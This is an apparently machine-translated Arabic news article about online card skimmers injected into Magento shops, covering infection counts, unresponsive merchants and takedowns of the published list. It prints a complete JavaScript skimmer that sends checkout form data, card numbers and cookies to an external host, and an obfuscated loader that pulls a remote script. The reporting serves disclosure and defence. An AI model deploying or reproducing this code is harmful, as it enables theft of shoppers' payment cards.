يعد القشط عبر الإنترنت شكلاً جديدًا نسبيًا من الاحتيال على بطاقات الائتمان. الجوهر واضح من الاسم. إذا كانت الكاشطة العادية عبارة عن تراكب على قارئ بطاقة ATM يفرغ شريطًا مغناطيسيًا ، فإن الكاشطة عبر الإنترنت هي إشارة مرجعية برمجية على خادم متجر على الإنترنت الذي يعترض بشكل سلبي بيانات الدفع أثناء إدخالها من قبل المستخدم في حقول النص في المستعرض. حتى الآن ، ركز Carders بشكل أساسي على خوادم المعاملات حيث يتم استخدام التشفير ، ولكن في هذه الحالة تتم إزالة المعلومات حتى قبل التشفير. بعد ذلك ، تُباع المعلومات المتعلقة ببطاقات الدفع في منتديات سرية: عادةً ما يمكن لشخص غريب إجراء عمليات الدفع باستخدام هذه البطاقات. يقولخبراء الأمن في Nightly Secureأن القشط عبر الإنترنت يكتسب شعبية بسرعة في الآونة الأخيرة. وللمرة الأولى ، نوقش انتشار هذا الاحتيال في عام 2015 . اعتبارًا من نوفمبر 2015 ، من قائمة 255000 متجر على الإنترنت ، تم العثور على 3.501 متجرًا بها إشارات JS على الخادم. على مدار العام ، زاد عددهم بنسبة 69٪.يبدو نموذج إشارة مرجعية لجافا سكريبت لاعتراض بيانات الدفع كما يلي (في هذه الحالة ، يتم إرسال المعلومات إلى http://ownsafety.org/opp.php):<script>
function j(e) {
var t = "; " + document.cookie,
o = t.split("; " + e + "=");
return 2 == o.length ? o.pop().split(";").shift() : void 0
}
j("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) {
e("button").on("click", function() {
var t = "",
o = "post",
n = window.location;
if (new RegExp("onepage|checkout").test(n)) {
for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) {
var a = c[i].name;
"" == a && (a = i), t += a + "=" + c[i].value + "&"
}
if (t) {
var l = new RegExp("[0-9]{13,16}"),
u = new XMLHttpRequest;
u.open(o, e("
<div />").html("http://ownsafety.org/opp.php").text(), !0), u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + j("SESSIID")), console.clear()
}
}
})
});
في العام الماضي ، جمع الباحثون قائمة بالعناوين الشائعة الاستخدام لجمع البيانات:1860 https:
390 http:
309 https:
100 https:
70 https:
28 https:
23 https:
22 https:
20 https:
17 https:
10 https:
9 http:
5 https:
1 /js/index.php
1 /js/am/extensions/sitemap_api.php
1 https:
1 https:
1 https:
1 http:
1 http:
في جميع الحالات تقريبًا ، يتم استخدام إصدارات صغيرة من نفس الرمز.يصعب اكتشاف هذه الإشارة المرجعية على الخادم. يتم تنزيل الرمز من CMS ويعمل في المتصفح. في العام الماضي ، عملت في المواقع الثلاثة آلاف ونصف المذكورة لعدة أشهر ، على عدة أشهر - ستة أشهر أو أكثر.يعتقد الخبراء أن عددًا كبيرًا من الخوادم المصابة يشير إلى درجة عالية من أتمتة الهجوم. ليس بعض الأطفال الصغار يفعلون ذلك ، ولكن المهنيين الجيدين. ربما من روسيا.لتنفيذ الإشارات المرجعية ، يتم استخدام نقاط الضعف في برامج المتاجر عبر الإنترنت. بادئ ذي بدء ، هو برنامج Magento Commerce الضعيفة. من خلال ذلك ، من الأسهل تنفيذ رمز CMS ، على الرغم من أن هذا الرمز يمكن أن يعمل في أي متجر على الإنترنت لا يستخدم بالضرورة Magento. تحقق من المتجر عبر الإنترنت للتعرف على نقاط الضعف على موقع MageReports.com .على الرغم من أن المشكلة أثيرت قبل عام ، إلا أنها لم تختف خلال العام الماضي. والأسوأ من ذلك ، أصبحت المتاجر المصابة على الإنترنت أكثر مرة ونصف. في مارس 2016 ، زاد عدد المتاجر التي لديها كاشطات من 3501 إلى 4476 ، وفي سبتمبر 2016 إلى 5925.نشر الأشخاص من Nightly Secure قائمة بجميع المتاجر المصابة من أجل تحذير العملاء - وإخطار مديري هذه المتاجر حول الثغرة الأمنية. في الواقع ، كان من بينها مواقع شائعة جدًا ، بما في ذلك أقسام مصنعي السيارات (Audi ZA) ، والمنظمات الحكومية (NRSC ، ماليزيا) ، ومواقع الموسيقيين المشهورين (Björk) ، والمنظمات غير الربحية (متحف العلوم ، كاتدرائية واشنطن).إذا تم استخدام تعديلات صغيرة لنفس الكاشط عبر الإنترنت في جميع المتاجر تقريبًا قبل عام ، فقد وجد الباحثون بالفعل 9 أصناف منفصلة من النص تنتمي إلى 3 عائلات مختلفة ( نموذج التعليمات البرمجية على Github ).أصبح المهاجمون أكثر ذكاءً ويستخدمون الآن التعتيم متعدد الرموز ، وهو ليس من السهل تحليله. على سبيل المثال ، يمكن إخفاء نص برمجي على النحو التالي:
كود البرامج الضارة الحقيقية:<script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72'+'\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f'+'\x34\x30\x37\x39\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72'+'\x69\x70\x74\x3e');
قام المؤلفون أيضًا بتحسين آلية اعتراض بيانات بطاقة الدفع. إذا كانت البرامج الضارة قد اعترضت ببساطة الصفحات التي تحتوي على سلسلة checkoutفي عنوان URL ، فإنها الآن تتعرف بالفعل على المكونات الإضافية الشائعة للدفع Firecheckout و Onestepcheckout و Paypal.حاول المتخصصون من Nightly Secure الاتصال بعدد من المتاجر (حوالي 30) وإبلاغهم عن الكاشطة المثبتة ، لكنهم لم يتلقوا استجابة من معظم المتاجر ، في حين أظهر آخرون عدم المبالاة. قال أحدهم إن هذه ليست مشكلته ، لأن الدفعات تتم من قبل شركة طرف ثالث. قال الثاني أنه كان خطأ جافا سكريبت فقط ولم يكن تهديدًا. قال الثالث أنه لا يمكن أن يكون هناك خطر ، لأن "المتجر يعمل على HTTPS". قدم المؤلف قائمة بمخازن الكاشطات إلى Google لإدراج التصفح الآمن في Chrome في القائمة السوداء.تم نشر قائمة بجميع متاجر الكاشطات في الأصل على Github . وهنا بدأ المرح. قريبا جيثب دون سابق إنذارأزال من موقعه نشر نتائج البحث من المتاجر على الإنترنت .على ما يبدو ، قامت Github بالرقابة وفقًا للإجراء القياسي ، بعد أن تلقت طلب قانون الألفية الجديدة لحقوق طبع ونشر المواد الرقمية من أحد المتاجر. بالطبع ، المتجر غير سار عندما يجدون الضعف ويخبرون العالم كله.يوم أمس ، نقل المؤلف نتائج دراسة أمن المتجر عبر الإنترنت إلى استضافة Gitlab . اليوم ، تظهر صفحة على هذا العنوان الخطأ 404. منذ ساعات قليلة ، تلقى المؤلف رسالة بريد إلكتروني من Gitlab توضح أسباب الإزالة. وبحسب الإدارة ، فإن نشر قائمة المتاجر الضعيفة يُنظر إليه على أنه "حالة فظيعة" لا يمكن حلها. لذلك ، تم حذف القائمة (UPD: تمت استعادة الوصولاعتذر مدير Gitlab).نسخة من القائمة الموجودة في أرشيف الويبنسخ إلى Pastebinلاحظ أن قائمة المتاجر التي تحتوي على كاشطات مثبتة على الإنترنت تسرد 44 نطاقًا في منطقة .RU.دعونا نأمل أن يقوم مديرو هذه المتاجر بتثبيت إصدار Magento بسرعة بأحدث التصحيحات وتعويض الخسائر للعملاء الذين لديهم نسخ من بطاقات الدفع المسربة إلى السوق السوداء.